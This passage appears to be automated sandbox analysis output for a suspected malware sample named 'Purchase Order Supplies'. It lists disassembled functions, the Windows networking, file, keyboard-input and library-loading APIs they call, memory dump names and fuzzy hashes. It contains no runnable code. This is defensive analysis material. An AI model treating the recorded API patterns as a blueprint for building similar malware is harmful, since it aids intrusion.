                          • Opcode Fuzzy Hash: 225baf80bd8080c86d99d2d28fa6d612b2ca644706237e51aeff64ce7ce73f0c
                          • Instruction Fuzzy Hash: C601A771B40315BBF768167D8C4BFBB72599B05F80F14042AFB67D23E1DE609D0991A4
                          Function 00CE91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006), ref: 00CE9235
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9244
                          • bind.WS2_32(00000000,?,00000010), ref: 00CE9260
                          • listen.WS2_32(00000000,00000005), ref: 00CE926F
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9289
                          • closesocket.WS2_32(00000000), ref: 00CE929D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:
                          • API String ID: 1279440585-0
                          • Opcode ID: f1163ed87b661a3d56dfb59c2a3a61723e9cef12f5041e5faf1140669046cbf9
                          • Instruction ID: e59b89846d002192f6d6c29273f4d5231e1024dd185a7fd402967d8dcf488729
                          • Opcode Fuzzy Hash: f1163ed87b661a3d56dfb59c2a3a61723e9cef12f5041e5faf1140669046cbf9
                          • Instruction Fuzzy Hash: DF21AD31600611AFCB10EF64C885BAEB7A9EF44324F118159FA67AB3D1CB74AD42DB61
                          Function 00C9A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • _memmove.LIBCMT ref: 00D03020
                          • _memmove.LIBCMT ref: 00D03135
                          • _memmove.LIBCMT ref: 00D031DC
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                          • String ID:
                          • API String ID: 1300846289-0
                          • Opcode ID: 851e4126b1b9518eb05cdb602539c4d7ca1bc4c1a60237dff6857f9b89a7b009
                          • Instruction ID: a4c96f72fa57fba246433d090c0d2af9e721cf4ed21e9619f76595f357ba5695
                          • Opcode Fuzzy Hash: 851e4126b1b9518eb05cdb602539c4d7ca1bc4c1a60237dff6857f9b89a7b009
                          • Instruction Fuzzy Hash: C3029270A00209DFCF04DF69D9856AEB7F9EF49300F148069F80ADB295EB31DA55DBA1
                          Function 00CE96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CEACD3: inet_addr.WS2_32(00000000), ref: 00CEACF5
                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00CE973D
                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 00CE9760
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLastinet_addrsocket
                          • String ID:
                          • API String ID: 4170576061-0
                          • Opcode ID: 8f7b677f8c646a69172c7bbb9abc922ea245b20a0de06360949ae2790471e88e
                          • Instruction ID: 34867bf6c50149734896cec4413a24fa04596f769b71c4957110f60cfa3e4d1d
                          • Opcode Fuzzy Hash: 8f7b677f8c646a69172c7bbb9abc922ea245b20a0de06360949ae2790471e88e
                          • Instruction Fuzzy Hash: 9541E470A00215AFDB10AF28CC86E6E77EDEF45328F148448F956AB3D2CB749E019B91
                          Function 00CDF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00CDF37A
                          • _wcscmp.LIBCMT ref: 00CDF3AA
                          • _wcscmp.LIBCMT ref: 00CDF3BF
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CDF3D0
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00CDF3FE
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:
                          • API String ID: 2387731787-0
                          • Opcode ID: 9b378e43d4ec4f3dbd3c8ed9d1a26de7499e217bba3797c4a7efa24eccbaa397
                          • Instruction ID: 71b05723863d676736afb14a66f93e5fddfa4097e91d2993207d541fe67f77c2
                          • Opcode Fuzzy Hash: 9b378e43d4ec4f3dbd3c8ed9d1a26de7499e217bba3797c4a7efa24eccbaa397
                          • Instruction Fuzzy Hash: 5B41B2356003029FC708DF28C491E9AB3E4FF49324F10456EEA6ACB3A1DB31E946CB91
                          Function 00CF20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CF20EC,?,00CF22E0), ref: 00CF2104
                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CF2116
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetProcessId$kernel32.dll
                          • API String ID: 2574300362-399901964
                          • Opcode ID: c0d4585ea7192604adad2f82284c2855af2ee4edce6fd9d3a4bbb8ee915fa98c
                          • Instruction ID: befe35db47756a0e4d0518833f775b6e7e0a93bf8f021bb0a40eda4231c6407d
                          • Opcode Fuzzy Hash: c0d4585ea7192604adad2f82284c2855af2ee4edce6fd9d3a4bbb8ee915fa98c
                          • Instruction Fuzzy Hash: 9BD0A774400312AFD7205F61E80D65637E8EF04310B01C429F759D1254DB70C8C0CA30
                          Function 00CD4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CD439C
                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CD43B8
                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00CD4425
                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00CD4483
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: a684c3b75284cf72e9d833504aaa72ffbbfe60bb9a4eb49998adf7745dfd95bd
                          • Instruction ID: 4aaa35611d50ed99d3ced518f4968fee7925ca8d5e32bbf49f5e7368baab1fd6
                          • Opcode Fuzzy Hash: a684c3b75284cf72e9d833504aaa72ffbbfe60bb9a4eb49998adf7745dfd95bd
                          • Instruction Fuzzy Hash: A541F5B0A00288ABEF289B659848BFEBBB5AB45311F04415BF795923C1C774CAC59762
                          Function 00CFEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • GetCursorPos.USER32(?), ref: 00CFEFE2
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D0F3C3,?,?,?,?,?), ref: 00CFEFF7
                          • GetCursorPos.USER32(?), ref: 00CFF041
                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D0F3C3,?,?,?), ref: 00CFF077
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                          • String ID:
                          • API String ID: 1423138444-0
                          • Opcode ID: ab718bbb0cc7136829399fce6d013d66326922e4b9df2ad76d12e7c84bb0b3c4
                          • Instruction ID: 52d094e661cd5d4fd85c4c47d78ad5bfe5777a7f0e80ea144ab3c52ac00342d0
                          • Opcode Fuzzy Hash: ab718bbb0cc7136829399fce6d013d66326922e4b9df2ad76d12e7c84bb0b3c4
                          • Instruction Fuzzy Hash: 9E21DF35500118BFCB258F54C898EFE7BB6EF09754F044068FA05973A2CB319E52DBA1
                          Function 00CD220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CD221E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($|
                          • API String ID: 1659193697-1631851259
                          • Opcode ID: a483e3c6e45405d07ec4dce70022c5d7359f287545143ce9f91fc2c1acf3f0be
                          • Instruction ID: 485ffcb7d66734512a63b8a55c7aff6b9c7c2bd98486bfd35e06267fe917febe
                          • Opcode Fuzzy Hash: a483e3c6e45405d07ec4dce70022c5d7359f287545143ce9f91fc2c1acf3f0be
                          • Instruction Fuzzy Hash: F5320375A007059FC728CF69C480A6AB7F0FF58320B15C46EE5AADB7A1E770E941CB54
                          Function 00CAAD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00CAAE5E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 4e389374c4df51a42c4f60e6001a384452ad02b72842cd92db5728f611876f8e
                          • Instruction ID: 2662adfe12ec0db98d6c1242e82db91f3caab1f02b9dc657a995ccfad6cfe92e
                          • Opcode Fuzzy Hash: 4e389374c4df51a42c4f60e6001a384452ad02b72842cd92db5728f611876f8e
                          • Instruction Fuzzy Hash: 57A16A6010420BBADB38AB2A8C88FBF395CEF43759B24452DF946D25E1DB25CD11E273
                          Function 00CE550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CE4A1E,00000000), ref: 00CE55FD
                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CE5629
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Internet$AvailableDataFileQueryRead
                          • String ID:
                          • API String ID: 599397726-0
                          • Opcode ID: d8284a79b58d883900c05f59635e966dd97330ccc78f3cffd3a476c831f2f84e
                          • Instruction ID: af638fdc872c65a1612e0e871c4632ce04ad2127b5539acd97713d7776c423a0
                          • Opcode Fuzzy Hash: d8284a79b58d883900c05f59635e966dd97330ccc78f3cffd3a476c831f2f84e
                          • Instruction Fuzzy Hash: CD41D771500A49BFEB109E96CC85EBFB7BDEB4071CF10401AF615A6281DA709F41EB64
                          Function 00CDEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDEA95
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CDEAEF
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CDEB3C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: 17e751a1129e7429ffa64e25748e846245f1f1a57d47705561cdaf302c9a6a59
                          • Instruction ID: 2222caedce647cecf812eb39fb194289ee5123037309f5cc16f6842a601571dc
                          • Opcode Fuzzy Hash: 17e751a1129e7429ffa64e25748e846245f1f1a57d47705561cdaf302c9a6a59
                          • Instruction Fuzzy Hash: C0215E35A00218EFCB00EFA5D894AEEBBB8FF49314F14849AE945EB351DB31E945DB50
                          Function 00CD70AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD70D8
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00CD7115
                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00CD711E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: c12a8af4d4c8aa2e274a763a778cc8baea8ab1a48bc869e8bb80b642ec4ffbcb
                          • Instruction ID: 74d9c5074dd1cc66efb501e422503398f02628dcf97b59b8def1d892913751ba
                          • Opcode Fuzzy Hash: c12a8af4d4c8aa2e274a763a778cc8baea8ab1a48bc869e8bb80b642ec4ffbcb
                          • Instruction Fuzzy Hash: B611A5B1900329BEE7108BA8DC45FEF77BCEB08714F004656BA15E7290D3B49E0587E1
                          Function 00C96670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 12160d39ee23300a8384e218a5b680e30ae77b517d54c3587ee89763f5da350e
                          • Instruction ID: 22829c907e3a6ae34f37c2e246a1a5141b404fdfbdf616e37f986d62a950604a
                          • Opcode Fuzzy Hash: 12160d39ee23300a8384e218a5b680e30ae77b517d54c3587ee89763f5da350e
                          • Instruction Fuzzy Hash: CDA26974E01219DFCF24CF59C8846ADBBB1FF48314F2581AAE859AB390DB719E81DB50
                          Function 00CAAFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • GetParent.USER32(?), ref: 00D0F4B5
                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00CAADDD,?,?,?,00000006,?), ref: 00D0F52F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LongWindow$DialogNtdllParentProc_
                          • String ID:
                          • API String ID: 314495775-0
                          • Opcode ID: 8d188bcbdf75b8bee33c46b393bacfc5890303cbc3d2dd9796a8f3903a0ebfae
                          • Instruction ID: 7eecb6347ef39e3b3ac6d796b1113da1e81e292a24cdd066dcaed5f5568e7e43
                          • Opcode Fuzzy Hash: 8d188bcbdf75b8bee33c46b393bacfc5890303cbc3d2dd9796a8f3903a0ebfae
                          • Instruction Fuzzy Hash: AF2155752001057FCB359F68DC48BAA3BA6AB47368F184264F93A4B3E3D7319E11E760
                          Function 00CFF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00D0F352,?,?,?), ref: 00CFF115
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00CFF0FB
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LongWindow$DialogMessageNtdllProc_Send
                          • String ID:
                          • API String ID: 1273190321-0
                          • Opcode ID: a043ccf454e765c37f0e6c70bad6073a29c1c2ae317891d3249fad5828924c46
                          • Instruction ID: 1d44707370abb10078356135fa9c13b9837412cf3d7157435dd960f2647b9170
                          • Opcode Fuzzy Hash: a043ccf454e765c37f0e6c70bad6073a29c1c2ae317891d3249fad5828924c46
                          • Instruction Fuzzy Hash: 89019231200208FBDB219F14DC45F6A3F66FF86364F148528FA154B3A1CB319803EB62
                          Function 00CFF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00CFF47D
                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00D0F42E,?,?,?,?,?), ref: 00CFF4A6
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
